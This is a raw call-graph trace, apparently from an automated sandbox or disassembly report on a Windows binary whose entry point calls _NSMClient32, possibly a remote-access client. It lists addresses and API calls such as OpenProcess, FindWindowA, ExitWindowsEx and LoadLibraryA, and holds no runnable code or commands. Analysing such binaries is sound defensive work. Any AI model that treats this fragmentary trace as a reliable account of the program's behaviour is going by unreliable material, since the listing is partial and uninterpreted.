94871->94856 94872->94858 94873->94860 94874->94858 94896 1116b73c GetLastError 94875->94896 94877 1116b7bd 94878 111633b1 94877->94878 94910 1116d7aa 66 API calls 3 library calls 94877->94910 94878->94867 94880 111704a8 94878->94880 94881 111704b4 __fsopen 94880->94881 94882 1116b7b5 __getptd 66 API calls 94881->94882 94883 111704b9 94882->94883 94884 111704e7 94883->94884 94886 111704cb 94883->94886 94933 1117373c 94884->94933 94888 1116b7b5 __getptd 66 API calls 94886->94888 94887 111704ee 94940 1117045b 74 API calls 3 library calls 94887->94940 94892 111704d0 94888->94892 94890 11170502 94941 11170515 LeaveCriticalSection _doexit 94890->94941 94894 111704de __fsopen 94892->94894 94932 1116d7aa 66 API calls 3 library calls 94892->94932 94894->94867 94895->94868 94911 1116b5fa TlsGetValue 94896->94911 94899 1116b7a9 SetLastError 94899->94877 94902 1116b76f DecodePointer 94903 1116b784 94902->94903 94904 1116b7a0 94903->94904 94905 1116b788 94903->94905 94907 11162be5 _free 62 API calls 94904->94907 94920 1116b688 66 API calls 4 library calls 94905->94920 94909 1116b7a6 94907->94909 94908 1116b790 GetCurrentThreadId 94908->94899 94909->94899 94912 1116b60f DecodePointer TlsSetValue 94911->94912 94913 1116b62a 94911->94913 94912->94913 94913->94899 94914 11169dbe 94913->94914 94917 11169dc7 94914->94917 94916 11169e04 94916->94899 94916->94902 94917->94916 94918 11169de5 Sleep 94917->94918 94921 11170166 94917->94921 94919 11169dfa 94918->94919 94919->94916 94919->94917 94920->94908 94922 11170172 94921->94922 94927 1117018d 94921->94927 94923 1117017e 94922->94923 94922->94927 94930 111692ef 66 API calls __getptd_noexit 94923->94930 94924 111701a0 RtlAllocateHeap 94926 111701c7 94924->94926 94924->94927 94926->94917 94927->94924 94927->94926 94931 1116d4a8 DecodePointer 94927->94931 94928 11170183 94928->94917 94930->94928 94931->94927 94934 11173764 EnterCriticalSection 94933->94934 94935 11173751 94933->94935 94934->94887 94942 1117367a 94935->94942 94937 11173757 94937->94934 94969 1116d7aa 66 API calls 3 library calls 94937->94969 94940->94890 94941->94892 94943 11173686 __fsopen 94942->94943 94944 11173696 94943->94944 94945 111736ae 94943->94945 94970 1116d99d 66 API calls 2 library calls 94944->94970 94953 111736bc __fsopen 94945->94953 94973 11169d79 94945->94973 94948 1117369b 94971 1116d7ee 66 API calls 7 library calls 94948->94971 94951 111736ce 94979 111692ef 66 API calls __getptd_noexit 94951->94979 94952 111736dd 94956 1117373c __lock 65 API calls 94952->94956 94953->94937 94954 111736a2 94972 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 94954->94972 94958 111736e4 94956->94958 94960 11173717 94958->94960 94961 111736ec InitializeCriticalSectionAndSpinCount 94958->94961 94962 11162be5 _free 65 API calls 94960->94962 94963 11173708 94961->94963 94964 111736fc 94961->94964 94962->94963 94981 11173733 LeaveCriticalSection _doexit 94963->94981 94965 11162be5 _free 65 API calls 94964->94965 94967 11173702 94965->94967 94980 111692ef 66 API calls __getptd_noexit 94967->94980 94970->94948 94971->94954 94975 11169d82 94973->94975 94974 11162b51 _malloc 65 API calls 94974->94975 94975->94974 94976 11169db8 94975->94976 94977 11169d99 Sleep 94975->94977 94976->94951 94976->94952 94978 11169dae 94977->94978 94978->94975 94978->94976 94979->94953 94980->94963 94981->94953 94982->94836 94983->94839 94984->94843 94985->94318 94986 11115b70 95004 11145320 94986->95004 94989 11115bb5 94990 11115b98 94989->94990 94991 11115bc4 CoInitialize CoCreateInstance 94989->94991 94992 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94990->94992 94994 11115bf4 LoadLibraryA 94991->94994 94997 11115be9 94991->94997 94995 11115ba6 94992->94995 94993 111450a0 std::_Mutex::_Mutex 90 API calls 94993->94989 94996 11115c10 GetProcAddress 94994->94996 94994->94997 95000 11115c20 SHGetSettings 94996->95000 95001 11115c34 FreeLibrary 94996->95001 94998 11115cd1 CoUninitialize 94997->94998 94999 11115cd7 94997->94999 94998->94999 95002 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94999->95002 95000->95001 95001->94997 95003 11115ce6 95002->95003 95005 111450a0 std::_Mutex::_Mutex 90 API calls 95004->95005 95006 11115b8e 95005->95006 95006->94989 95006->94990 95006->94993 95007 11173a35 95008 1116b7b5 __getptd 66 API calls 95007->95008 95009 11173a52 _LcidFromHexString 95008->95009 95010 11173a5f GetLocaleInfoA 95009->95010 95011 11173a86 95010->95011 95012 11173a92 95010->95012 95014 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95011->95014 95030 111646ce 85 API calls 2 library calls 95012->95030 95016 11173c02 95014->95016 95015 11173a9e 95017 11173aa8 GetLocaleInfoA 95015->95017 95027 11173ad8 _LangCountryEnumProc@4 _strlen 95015->95027 95017->95011 95018 11173ac7 95017->95018 95031 111646ce 85 API calls 2 library calls 95018->95031 95019 11173b4b GetLocaleInfoA 95019->95011 95021 11173b6e 95019->95021 95033 111646ce 85 API calls 2 library calls 95021->95033 95023 11173ad2 95023->95027 95032 11163784 85 API calls 2 library calls 95023->95032 95025 11173b79 95025->95011 95028 11173b81 _strlen 95025->95028 95034 111646ce 85 API calls 2 library calls 95025->95034 95027->95011 95027->95019 95028->95011 95035 111739da GetLocaleInfoW _GetPrimaryLen _strlen 95028->95035 95030->95015 95031->95023 95032->95027 95033->95025 95034->95028 95035->95011 95036 1102e640 95037 1102e683 95036->95037 95038 1110f420 std::_Mutex::_Mutex 265 API calls 95037->95038 95039 1102e68a 95038->95039 95041 1102e6aa 95039->95041 96107 11142a60 95039->96107 95435 11142bb0 95041->95435 95043 1102e6d4 95044 1102e701 95043->95044 96115 11081bb0 95043->96115 95047 11142bb0 86 API calls 95044->95047 95046 1102e6e6 95048 11081bb0 86 API calls 95046->95048 95049 1102e72a 95047->95049 95048->95044 95050 11162de7 std::_Mutex::_Mutex 79 API calls 95049->95050 95054 1102e737 95049->95054 95050->95054 95051 1102e766 95052 1102e7e5 CreateEventA 95051->95052 95053 1102e7bf GetSystemMetrics 95051->95053 95059 1102e805 95052->95059 95060 1102e819 95052->95060 95053->95052 95055 1102e7ce 95053->95055 95054->95051 95057 111450a0 std::_Mutex::_Mutex 90 API calls 95054->95057 95058 11146450 std::_Mutex::_Mutex 21 API calls 95055->95058 95057->95051 95061 1102e7d8 95058->95061 96269 11029450 265 API calls 2 library calls 95059->96269 95064 1110f420 std::_Mutex::_Mutex 265 API calls 95060->95064 96125 1102d330 95061->96125 95065 1102e820 95064->95065 95066 1102e840 95065->95066 95067 111100d0 425 API calls 95065->95067 95068 1110f420 std::_Mutex::_Mutex 265 API calls 95066->95068 95067->95066 95069 1102e854 95068->95069 95070 111100d0 425 API calls 95069->95070 95071 1102e874 95069->95071 95070->95071 95072 1110f420 std::_Mutex::_Mutex 265 API calls 95071->95072 95073 1102e8f3 95072->95073 95074 1102e923 95073->95074 96270 11060f70 301 API calls std::_Mutex::_Mutex 95073->96270 95076 1110f420 std::_Mutex::_Mutex 265 API calls 95074->95076 95077 1102e93d 95076->95077 95078 1102e962 FindWindowA 95077->95078 96271 11060be0 293 API calls std::_Mutex::_Mutex 95077->96271 95081 1102eab7 95078->95081 95082 1102e99b 95078->95082 95442 110613d0 95081->95442 95082->95081 95086 1102e9b3 GetWindowThreadProcessId 95082->95086 95085 110613d0 268 API calls 95087 1102ead5 95085->95087 95088 11146450 std::_Mutex::_Mutex 21 API calls 95086->95088 95089 110613d0 268 API calls 95087->95089 95090 1102e9d9 OpenProcess 95088->95090 95091 1102eae1 95089->95091 95090->95081 95092 1102e9f9 95090->95092 95094 1102eaf8 95091->95094 95095 1102eaef 95091->95095 96272 11094b30 105 API calls 95092->96272 95449 11145910 95094->95449 96273 11027d60 119 API calls 2 library calls 95095->96273 95096 1102ea18 95098 11146450 std::_Mutex::_Mutex 21 API calls 95096->95098 95101 1102ea2c 95098->95101 95099 1102eaf4 95099->95094 95103 1102ea6b CloseHandle FindWindowA 95101->95103 95104 11146450 std::_Mutex::_Mutex 21 API calls 95101->95104 95102 1102eb07 95464 11144dc0 ExpandEnvironmentStringsA 95102->95464 95105 1102ea93 GetWindowThreadProcessId 95103->95105 95106 1102eaa7 95103->95106 95109 1102ea3e SendMessageA WaitForSingleObject 95104->95109 95105->95106 95110 11146450 std::_Mutex::_Mutex 21 API calls 95106->95110 95109->95103 95112 1102ea5e 95109->95112 95113 1102eab4 95110->95113 95115 11146450 std::_Mutex::_Mutex 21 API calls 95112->95115 95113->95081 95114 1102eb2a 95116 1102ec01 95114->95116 95488 11062d60 95114->95488 95117 1102ea68 95115->95117 95503 110274c0 95116->95503 95117->95103 96334 11142ac0 95435->96334 95437 11142bf3 95437->95043 95438 11165797 85 API calls std::_Mutex::_Mutex 95440 11142bc5 95438->95440 95439 11142ac0 IsDBCSLeadByte 95439->95440 95440->95437 95440->95438 95440->95439 95441 11142bfc 95440->95441 95441->95043 95443 11061446 95442->95443 95444 110613f7 95442->95444 95445 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95443->95445 95444->95443 95448 11081bb0 86 API calls 95444->95448 96346 110612f0 268 API calls 4 library calls 95444->96346 95447 1102eac9 95445->95447 95447->95085 95448->95444 96347 11144bd0 95449->96347 95452 11144bd0 std::_Mutex::_Mutex 265 API calls 95453 11145947 wsprintfA 95452->95453 95454 11143230 std::_Mutex::_Mutex 8 API calls 95453->95454 95456 11145964 95454->95456 95455 11145990 95458 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95455->95458 95456->95455 95457 11143230 std::_Mutex::_Mutex 8 API calls 95456->95457 95459 11145979 95457->95459 95460 1114599c 95458->95460 95459->95455 95461 11145980 95459->95461 95460->95102 95462 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95461->95462 95463 1114598c 95462->95463 95463->95102 95465 11144df7 95464->95465 95466 11144e14 std::_Mutex::_Mutex 95465->95466 95467 11144e2e 95465->95467 95475 11144e04 95465->95475 95470 11144e25 GetModuleFileNameA 95466->95470 95468 11144bd0 std::_Mutex::_Mutex 265 API calls 95467->95468 95471 11144e34 95468->95471 95469 11142290 std::_Mutex::_Mutex 265 API calls 95472 11144e88 95469->95472 95470->95471 95473 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 95471->95473 95474 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95472->95474 95473->95475 95476 1102eb18 95474->95476 95475->95469 95477 11143230 95476->95477 95478 11143251 CreateFileA 95477->95478 95480 111432ee CloseHandle 95478->95480 95481 111432ce 95478->95481 95484 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95480->95484 95482 111432d2 CreateFileA 95481->95482 95483 1114330b 95481->95483 95482->95480 95482->95483 95486 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95483->95486 95485 11143307 95484->95485 95485->95114 95487 1114331a 95486->95487 95487->95114 95489 1105dd10 79 API calls 95488->95489 95490 11062d88 95489->95490 96396 11061c90 95490->96396 97164 11060f40 95503->97164 96108 11142aa8 96107->96108 96111 11142a6e 96107->96111 96109 11142290 std::_Mutex::_Mutex 265 API calls 96108->96109 96110 11142ab0 96109->96110 96110->95041 96111->96108 96112 11142a92 96111->96112 99083 11142310 267 API calls std::_Mutex::_Mutex 96112->99083 96114 11142a98 96114->95041 96116 11081bbd 96115->96116 96117 11081bc2 96115->96117 99084 11081990 IsDBCSLeadByte 96116->99084 96119 11081bcb 96117->96119 96122 11081bdf 96117->96122 99085 111646ce 85 API calls 2 library calls 96119->99085 96121 11081bd8 96121->95046 96123 11081c43 96122->96123 96124 11165797 85 API calls std::_Mutex::_Mutex 96122->96124 96123->95046 96124->96122 96126 11146450 std::_Mutex::_Mutex 21 API calls 96125->96126 96127 1102d36c 96126->96127 96128 11145320 std::_Mutex::_Mutex 90 API calls 96127->96128 96129 1102d374 96128->96129 96130 1102d3a9 GetCurrentProcess SetPriorityClass 96129->96130 96131 1102d37d InterlockedIncrement 96129->96131 96134 1102d3dd 96130->96134 96131->96130 96132 1102d38c 96131->96132 96133 11146450 std::_Mutex::_Mutex 21 API calls 96132->96133 96135 1102d396 96133->96135 96136 1102d3e6 SetEvent 96134->96136 96140 1102d3ed 96134->96140 96137 1102d3a0 Sleep 96135->96137 96136->96140 96137->96137 96138 1102d424 96139 1102d452 96138->96139 99105 1109f1d0 273 API calls std::_Mutex::_Mutex 96138->99105 99106 11028e70 584 API calls std::_Mutex::_Mutex 96139->99106 96140->96138 99103 11029370 279 API calls 2 library calls 96140->99103 96144 1102d40d 99104 110ff6c0 278 API calls 2 library calls 96144->99104 96146 1102d463 99086 11028090 SetEvent 96146->99086 96148 1102d468 96149 1102d472 96148->96149 96150 1102d47d 96148->96150 99107 110ec980 998 API calls 96149->99107 96152 1102d49a 96150->96152 96153 1102d49f 96150->96153 99108 110594a0 SetEvent 96152->99108 96155 1102d4a7 96153->96155 96156 1102d4de 96153->96156 96155->96156 96163 1102d4d3 Sleep 96155->96163 96157 11146450 std::_Mutex::_Mutex 21 API calls 96156->96157 96158 1102d4e8 96157->96158 96159 1102d4f5 96158->96159 96160 1102d526 96158->96160 96159->96158 96161 1105dd10 79 API calls 96159->96161 96162 1102d523 96160->96162 96165 1102d58a 96160->96165 96166 1102d53f 96160->96166 96164 1102d518 96161->96164 96162->96160 96162->96165 96163->96156 96164->96160 99109 1102cff0 294 API calls std::_Mutex::_Mutex 96164->99109 99112 11026f20 6 API calls std::ios_base::_Tidy 96165->99112 99087 110affa0 96166->99087 96170 1102d590 96177 1102d5af PostThreadMessageA 96170->96177 96179 1102d5cb 96170->96179 96173 1102d613 96178 1102d62d 96173->96178 96187 11146450 std::_Mutex::_Mutex 21 API calls 96173->96187 96175 1102d5f0 99115 11059400 DeleteCriticalSection CloseHandle 96175->99115 99113 1110f3a0 WaitForSingleObject 96177->99113 96182 1102d66b 96178->96182 99116 11105420 26 API calls std::_Mutex::_Mutex 96178->99116 96179->96173 96179->96175 99114 1110f3a0 WaitForSingleObject 96179->99114 96180 1102d56a 96266 1102d57d std::ios_base::_Tidy 96180->96266 99111 111352b0 299 API calls 5 library calls 96180->99111 96186 1102d681 96182->96186 96192 11075d10 947 API calls 96182->96192 96188 11146450 std::_Mutex::_Mutex 21 API calls 96186->96188 96187->96178 96193 1102d68b 96188->96193 96190 1102d661 99117 11107b50 662 API calls std::_Mutex::_Mutex 96190->99117 96192->96186 96196 1113cc30 311 API calls 96193->96196 96195 1102d889 96199 1102d8a0 96195->96199 99136 1100d200 wsprintfA 96195->99136 96200 1102d690 96196->96200 96198 1102d666 99118 11105ac0 347 API calls std::_Mutex::_Mutex 96198->99118 96206 1102d8c7 GetModuleFileNameA GetFileAttributesA 96199->96206 96219 1102d9e3 96199->96219 96204 11146450 std::_Mutex::_Mutex 21 API calls 96200->96204 96207 1102d69a 96204->96207 96205 1102d895 96208 11146450 std::_Mutex::_Mutex 21 API calls 96205->96208 96209 1102d8ef 96206->96209 96206->96219 96216 1102d6ae std::ios_base::_Tidy 96207->96216 99119 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 96207->99119 96208->96199 96211 1110f420 std::_Mutex::_Mutex 265 API calls 96209->96211 96210 11146450 std::_Mutex::_Mutex 21 API calls 96213 1102da92 96210->96213 96215 1102d8f6 96211->96215 99139 11146410 FreeLibrary 96213->99139 96214 11146450 std::_Mutex::_Mutex 21 API calls 96218 1102d6c1 96214->96218 96221 11142a60 267 API calls 96215->96221 96232 1102d918 96215->96232 96216->96214 96224 1102d6d5 std::ios_base::_Tidy 96218->96224 99120 1110e5c0 DeleteCriticalSection std::ios_base::_Tidy 96218->99120 96219->96210 96220 1102da9a 96222 1102dad6 96220->96222 96228 1102dac4 ExitWindowsEx 96220->96228 96229 1102dab4 ExitWindowsEx Sleep 96220->96229 96221->96232 96225 1102dae6 96222->96225 96226 1102dadb Sleep 96222->96226 96227 1102d74f 96224->96227 99121 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96224->99121 96230 11146450 std::_Mutex::_Mutex 21 API calls 96225->96230 96226->96225 96237 1102d760 std::ios_base::_Tidy 96227->96237 99123 1110fc70 278 API calls 2 library calls 96227->99123 96228->96222 96229->96228 96236 11142bb0 86 API calls 96232->96236 96239 1102d93d 96236->96239 96259 1102d7d9 std::ios_base::_Tidy 96237->96259 99124 1110fc70 278 API calls 2 library calls 96237->99124 96238 11146450 std::_Mutex::_Mutex 21 API calls 96240 1102d7ec 96238->96240 96239->96219 96242 1102d809 CloseHandle 96240->96242 99125 1108a570 96240->99125 96244 1102d824 96242->96244 96245 1102d82a 96242->96245 96249 11162be5 _free 66 API calls 96244->96249 96245->96266 99132 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96245->99132 96246 11146450 std::_Mutex::_Mutex 21 API calls 96258 1102d6ff std::ios_base::_Tidy 96246->96258 96249->96245 96250 1102d800 std::ios_base::_Tidy 96250->96242 96257 1102d858 96257->96266 99134 1110fc70 278 API calls 2 library calls 96257->99134 96258->96227 96258->96246 99122 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96258->99122 96259->96238 96260 11162be5 _free 66 API calls 96265 1102d83c 96260->96265 96265->96257 96265->96260 99133 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96265->99133 99135 1100d4e0 FreeLibrary 96266->99135 96270->95074 96271->95078 96272->95096 96273->95099 96335 11142ad6 96334->96335 96336 11142b93 96335->96336 96341 11081a70 96335->96341 96336->95440 96338 11142afb 96339 11081a70 IsDBCSLeadByte 96338->96339 96340 11142b2b _memmove 96339->96340 96340->95440 96342 11081a7c 96341->96342 96344 11081a81 std::_Mutex::_Mutex __mbschr_l 96341->96344 96345 11081990 IsDBCSLeadByte 96342->96345 96344->96338 96345->96344 96346->95444 96348 11144bf2 96347->96348 96349 11144c09 std::_Mutex::_Mutex 96347->96349 96393 11029450 265 API calls 2 library calls 96348->96393 96351 11144d97 96349->96351 96354 11144c3c GetModuleFileNameA 96349->96354 96353 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 96351->96353 96355 11144db3 wsprintfA 96353->96355 96371 11081b40 96354->96371 96355->95452 96357 11144c51 96358 11144c61 SHGetFolderPathA 96357->96358 96359 11144d48 96357->96359 96361 11144c8e 96358->96361 96362 11144cad SHGetFolderPathA 96358->96362 96360 11142290 std::_Mutex::_Mutex 262 API calls 96359->96360 96360->96351 96361->96362 96365 11144c94 96361->96365 96364 11144ce2 std::_Mutex::_Mutex 96362->96364 96367 1102a620 std::_Mutex::_Mutex 145 API calls 96364->96367 96394 11029450 265 API calls 2 library calls 96365->96394 96369 11144cf3 96367->96369 96375 11144670 96369->96375 96373 11081b53 _strrchr 96371->96373 96372 11081b6a std::_Mutex::_Mutex 96372->96357 96373->96372 96395 11081990 IsDBCSLeadByte 96373->96395 96376 111446fa 96375->96376 96377 1114467b 96375->96377 96376->96359 96377->96376 96377->96377 96378 1114468b GetFileAttributesA 96377->96378 96379 111446a5 96378->96379 96380 11144697 96378->96380 96381 11163cf8 __strdup 66 API calls 96379->96381 96380->96359 96382 111446ac 96381->96382 96383 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 96382->96383 96384 111446b6 96383->96384 96385 11144670 std::_Mutex::_Mutex 67 API calls 96384->96385 96391 111446d3 96384->96391 96386 111446c6 96385->96386 96387 111446dc 96386->96387 96388 111446ce 96386->96388 96390 11162be5 _free 66 API calls 96387->96390 96389 11162be5 _free 66 API calls 96388->96389 96389->96391 96392 111446e1 CreateDirectoryA 96390->96392 96391->96359 96392->96391 96395->96372 96517 11144ea0 96396->96517 96398 11061d1c 96519 11144eb3 std::ios_base::_Tidy 96517->96519 96518 11144dc0 267 API calls 96518->96519 96519->96518 96521 11144f1a std::ios_base::_Tidy 96519->96521 96522 11144ed5 GetLastError 96519->96522 96618 11163fed 96519->96618 96521->96398 96522->96519 97168 11060e40 97164->97168 97179 11060760 97168->97179 97180 1110f420 std::_Mutex::_Mutex 265 API calls 97179->97180 97181 1106077c 97180->97181 99083->96114 99084->96117 99085->96121 99086->96148 99140 110805f0 99087->99140 99092 1102d54a 99096 110eb080 99092->99096 99093 110affe7 99152 11029450 265 API calls 2 library calls 99093->99152 99097 110affa0 267 API calls 99096->99097 99098 110eb0ad 99097->99098 99168 110ea450 99098->99168 99102 1102d555 99110 110b0190 267 API calls std::_Mutex::_Mutex 99102->99110 99103->96144 99104->96138 99105->96139 99106->96146 99107->96150 99108->96153 99109->96162 99110->96180 99111->96266 99112->96170 99113->96170 99114->96179 99116->96190 99117->96198 99118->96182 99120->96224 99121->96258 99122->96258 99123->96237 99124->96259 99126 1108a617 99125->99126 99129 1108a5aa std::ios_base::_Tidy 99125->99129 99127 1108a61e DeleteCriticalSection 99126->99127 99181 1106e1b0 99127->99181 99128 1108a5be CloseHandle 99128->99129 99129->99126 99129->99128 99131 1108a644 std::ios_base::_Tidy 99131->96250 99132->96265 99133->96265 99134->96266 99135->96195 99136->96205 99139->96220 99141 11080614 99140->99141 99142 11080618 99141->99142 99143 1108062f 99141->99143 99153 11029450 265 API calls 2 library calls 99142->99153 99144 11080648 99143->99144 99145 1108062c 99143->99145 99149 110aff90 99144->99149 99145->99143 99154 11029450 265 API calls 2 library calls 99145->99154 99155 110812d0 99149->99155 99156 1108131d 99155->99156 99157 110812f1 99155->99157 99160 1108136a wsprintfA 99156->99160 99161 11081345 wsprintfA 99156->99161 99157->99156 99158 1108130b 99157->99158 99159 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99158->99159 99162 11081319 99159->99162 99167 11029450 265 API calls 2 library calls 99160->99167 99161->99156 99162->99092 99162->99093 99170 110ea45b 99168->99170 99169 110ea4f5 99178 110b0190 267 API calls std::_Mutex::_Mutex 99169->99178 99170->99169 99171 110ea47e 99170->99171 99173 110ea495 99170->99173 99179 11029450 265 API calls 2 library calls 99171->99179 99174 110ea492 99173->99174 99175 110ea4c2 SendMessageTimeoutA 99173->99175 99174->99173 99180 11029450 265 API calls 2 library calls 99174->99180 99175->99169 99178->99102 99184 1106e1c4 99181->99184 99182 1106e1c8 99182->99131 99184->99182 99185 1106d9a0 67 API calls 2 library calls 99184->99185 99185->99184 99200 11134d10 99201 11134d48 99200->99201 99202 11134d19 99200->99202 99203 11145320 std::_Mutex::_Mutex 90 API calls 99202->99203 99204 11134d1e 99203->99204 99204->99201 99205 11132bf0 274 API calls 99204->99205 99206 11134d27 99205->99206 99206->99201 99207 1105dd10 79 API calls 99206->99207 99207->99201 99208 110310c0 99209 110310ce 99208->99209 99210 11145e80 268 API calls 99209->99210 99211 110310df SetUnhandledExceptionFilter 99210->99211 99212 110310ef std::_Mutex::_Mutex 99211->99212 99213 11040860 99214 11040892 99213->99214 99215 11040898 99214->99215 99220 110408b4 99214->99220 99216 110facc0 15 API calls 99215->99216 99218 110408aa CloseHandle 99216->99218 99217 110409c8 99219 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99217->99219 99218->99220 99221 110409d5 99219->99221 99220->99217 99223 110408ed 99220->99223 99245 11087ee0 297 API calls 5 library calls 99220->99245 99222 11040948 99235 110facc0 GetTokenInformation 99222->99235 99223->99217 99223->99222 99226 1104095a 99227 11040962 CloseHandle 99226->99227 99231 11040969 99226->99231 99227->99231 99228 110409ab 99229 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99228->99229 99233 110409c4 99229->99233 99230 11040991 99232 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99230->99232 99231->99228 99231->99230 99234 110409a7 99232->99234 99236 110fad08 99235->99236 99237 110facf7 99235->99237 99246 110f1f50 9 API calls 99236->99246 99238 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99237->99238 99241 110fad04 99238->99241 99240 110fad2c 99240->99237 99242 110fad34 99240->99242 99241->99226 99242->99242 99243 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99242->99243 99244 110fad5a 99243->99244 99244->99226 99245->99223 99246->99240 99247 11089a40 99248 1110f6c0 ___DllMainCRTStartup 4 API calls 99247->99248 99249 11089a53 99248->99249 99250 11089a5d 99249->99250 99259 11089150 268 API calls std::_Mutex::_Mutex 99249->99259 99253 11089a84 99250->99253 99260 11089150 268 API calls std::_Mutex::_Mutex 99250->99260 99255 11089a93 99253->99255 99256 11089a10 99253->99256 99261 110896a0 99256->99261 99259->99250 99260->99253 99302 11088970 6 API calls ___DllMainCRTStartup 99261->99302 99263 110896d9 GetParent 99264 110896ec 99263->99264 99265 110896fd 99263->99265 99267 110896f0 GetParent 99264->99267 99266 11144dc0 267 API calls 99265->99266 99268 11089709 99266->99268 99267->99265 99267->99267 99269 11163fed std::_Mutex::_Mutex 143 API calls 99268->99269 99270 11089716 std::ios_base::_Tidy 99269->99270 99271 11144dc0 267 API calls 99270->99271 99272 1108972f 99271->99272 99303 11013830 22 API calls 2 library calls 99272->99303 99274 1108974a 99274->99274 99275 11143230 std::_Mutex::_Mutex 8 API calls 99274->99275 99277 1108978a std::ios_base::_Tidy 99275->99277 99276 110897a5 99278 11163db7 std::_Mutex::_Mutex 102 API calls 99276->99278 99281 110897c3 std::_Mutex::_Mutex 99276->99281 99277->99276 99279 11142290 std::_Mutex::_Mutex 265 API calls 99277->99279 99278->99281 99279->99276 99280 11089874 std::ios_base::_Tidy 99282 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99280->99282 99281->99280 99283 1102a620 std::_Mutex::_Mutex 145 API calls 99281->99283 99285 11089962 99282->99285 99284 11089813 99283->99284 99286 11142290 std::_Mutex::_Mutex 265 API calls 99284->99286 99285->99255 99287 1108981b 99286->99287 99288 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 99287->99288 99289 11089832 99288->99289 99289->99280 99290 11081bb0 86 API calls 99289->99290 99291 1108984a 99290->99291 99292 1108988e 99291->99292 99293 11089851 99291->99293 99294 11081bb0 86 API calls 99292->99294 99304 110b75d0 99293->99304 99296 11089899 99294->99296 99296->99280 99298 110b75d0 68 API calls 99296->99298 99300 110898a6 99298->99300 99299 110b75d0 68 API calls 99299->99280 99300->99280 99301 110b75d0 68 API calls 99300->99301 99301->99280 99302->99263 99303->99274 99307 110b75b0 99304->99307 99310 111672e3 99307->99310 99313 11167264 99310->99313 99314 11167271 99313->99314 99315 1116728b 99313->99315 99331 11169302 66 API calls __getptd_noexit 99314->99331 99315->99314 99316 11167294 GetFileAttributesA 99315->99316 99318 111672a2 GetLastError 99316->99318 99324 111672b8 99316->99324 99334 11169315 66 API calls 3 library calls 99318->99334 99319 11167276 99332 111692ef 66 API calls __getptd_noexit 99319->99332 99322 11089857 99322->99280 99322->99299 99323 111672ae 99335 111692ef 66 API calls __getptd_noexit 99323->99335 99324->99322 99336 11169302 66 API calls __getptd_noexit 99324->99336 99325 1116727d 99333 1116df04 11 API calls __gmtime64_s 99325->99333 99329 111672cb 99337 111692ef 66 API calls __getptd_noexit 99329->99337 99331->99319 99332->99325 99333->99322 99334->99323 99335->99322 99336->99329 99337->99323 99338 4b1020 GetCommandLineA 99339 4b1035 GetStartupInfoA 99338->99339 99341 4b108b 99339->99341 99342 4b1090 GetModuleHandleA 99339->99342 99341->99342 99345 4b1000 _NSMClient32 99342->99345 99344 4b10a2 ExitProcess 99345->99344 99346 111071e0 99347 111071ec 99346->99347 99348 1110720f 99347->99348 99349 111450a0 std::_Mutex::_Mutex 90 API calls 99347->99349 99354 11107218 99348->99354 99392 11106100 GetTickCount EnterCriticalSection GetTickCount 99348->99392 99351 11107201 99349->99351 99351->99348 99355 111062e0 99351->99355 99352 11107223 99429 11163180 99355->99429 99357 111062fb LoadLibraryA 99440 11137340 279 API calls 2 library calls 99357->99440 99359 11106361 99360 11106365 99359->99360 99361 1110637d 99359->99361 99360->99361 99363 1110636a 99360->99363 99362 111450a0 std::_Mutex::_Mutex 90 API calls 99361->99362 99364 11106386 99362->99364 99365 11106375 99363->99365 99366 1110636e FreeLibrary 99363->99366 99367 111063a1 LoadLibraryA GetProcAddress 99364->99367 99368 11106397 99364->99368 99370 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99365->99370 99366->99365 99369 111064d1 SetLastError 99367->99369 99379 11106443 99367->99379 99368->99367 99371 1110660f 99369->99371 99372 11106665 99370->99372 99373 111450a0 std::_Mutex::_Mutex 90 API calls 99371->99373 99372->99348 99374 11106624 99373->99374 99375 11106635 FreeLibrary 99374->99375 99376 1110663c 99374->99376 99375->99376 99376->99365 99377 11106640 FreeLibrary 99376->99377 99377->99365 99378 111064f2 OpenProcess 99378->99379 99390 11106497 99378->99390 99379->99371 99379->99378 99379->99390 99430 11025d00 99379->99430 99380 111064a5 GetProcAddress 99382 111064de SetLastError 99380->99382 99380->99390 99382->99390 99383 111065e5 